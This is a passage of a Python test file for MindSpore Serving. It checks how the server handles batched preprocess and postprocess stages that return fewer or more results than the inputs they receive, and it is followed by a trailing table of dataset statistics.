x1 = np.array([[5.5, 6.6], [7.7, 8.8]], np.float32) * 1.1 * (i + 1)
x2 = np.array([[1.5, 2.6], [3.7, 4.8]], np.float32) * 1.1 * (i + 1)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "predict")
result = client.infer(instances)
print("result", result)
if isinstance(result, dict):
assert "servable is not available" in result["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result["error"]
else:
assert "servable is not available" in result[0]["error"] \
or f"Call Function '{base.servable_name}.func_test_batch' Failed" in result[0]["error"]
@serving_test
def test_servable_postprocess_result_count_less():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, return instances count less then input
instances count
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def postprocess(instances):
count = len(instances)
for i in range(count -1):
yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
y = register.add_stage(postprocess, y, outputs_count=1, batch_size=4, tag="Postprocess")
return y
"""
base = start_serving_server(servable_content)
# Client
instance_count = 2
instances = []
y_data_list = []
for i in range(instance_count):
x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
y_data_list.append(x1 + x2)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "add_common")
result = client.infer(instances)
print(result)
assert "Postprocess Failed" in str(result[1]["error"]) or 'servable is not available' in str(result[1]["error"])
@serving_test
def test_servable_postprocess_result_count_more():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, return instances count more then input
instances count
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def postprocess(instances):
count = len(instances)
for i in range(count + 1):
yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
y = register.add_stage(model, x1, x2, outputs_count=1)
y = register.add_stage(postprocess, y, outputs_count=1, batch_size=4, tag="Postprocess")
return y
"""
base = start_serving_server(servable_content)
# Client
instance_count = 2
instances = []
y_data_list = []
for i in range(instance_count):
x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
y_data_list.append(x1 + x2)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "add_common")
result = client.infer(instances)
print(result)
assert len(result) == instance_count
assert result[0]["y"] == 0
assert result[1]["y"] == 1
@serving_test
def test_stage_function_preprocess_result_count_less():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, return instances count less then input
instances count
Expectation: Serving server report error.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def preprocess(instances):
count = len(instances)
for i in range(count-1):
yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
x3 = register.add_stage(preprocess, x1, outputs_count=1, batch_size=4, tag="Preprocess")
y = register.add_stage(model, x1, x2, outputs_count=1)
return x3
"""
base = start_serving_server(servable_content)
# Client
instance_count = 2
instances = []
y_data_list = []
for i in range(instance_count):
x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
y_data_list.append(x1 + x2)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "add_common")
result = client.infer(instances)
print(result)
if isinstance(result, list):
assert "Preprocess Failed" in str(result[1]["error"]) or "servable is not available" in str(result[1]["error"])
else:
assert "Preprocess Failed" in str(result["error"]) or "servable is not available" in str(result["error"])
@serving_test
def test_stage_function_preprocess_result_count_more():
"""
Feature: test servable_config.py stage
Description: Stage python function run with batch_size parameter, return instances count more then input
instances count
Expectation: Serving server work well.
"""
servable_content = r"""
import numpy as np
from mindspore_serving.server import register
model = register.declare_model(model_file="tensor_add.mindir", model_format="MindIR", with_batch_dim=True)
def preprocess(instances):
count = len(instances)
for i in range(count+1):
yield i
@register.register_method(output_names=["y"])
def add_common(x1, x2):
x3 = register.add_stage(preprocess, x1, outputs_count=1, batch_size=4, tag="Preprocess")
y = register.add_stage(model, x1, x2, outputs_count=1)
return x3
"""
base = start_serving_server(servable_content)
# Client
instance_count = 3
instances = []
y_data_list = []
for i in range(instance_count):
x1 = np.asarray([[1.1], [3.3]]).astype(np.float32) * (i + 1)
x2 = np.asarray([[5.5], [7.7]]).astype(np.float32) * (i + 1)
y_data_list.append(x1 + x2)
instances.append({"x1": x1, "x2": x2})
client = create_client("localhost:5500", base.servable_name, "add_common")
result = client.infer(instances)
print(result)
assert len(result) == instance_count
| 36.532353
| 119
| 0.669833
| 7,189
| 49,684
| 4.447211
| 0.033523
| 0.015264
| 0.024866
| 0.02984
| 0.959401
| 0.954021
| 0.949673
| 0.948328
| 0.947296
| 0.941259
| 0
| 0.044901
| 0.193141
| 49,684
| 1,359
| 120
| 36.559235
| 0.752619
| 0.130082
| 0
| 0.897959
| 0
| 0.010204
| 0.462008
| 0.189746
| 0
| 0
| 0
| 0
| 0.093878
| 1
| 0.034694
| false
| 0.00102
| 0.070408
| 0.00102
| 0.157143
| 0.029592
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.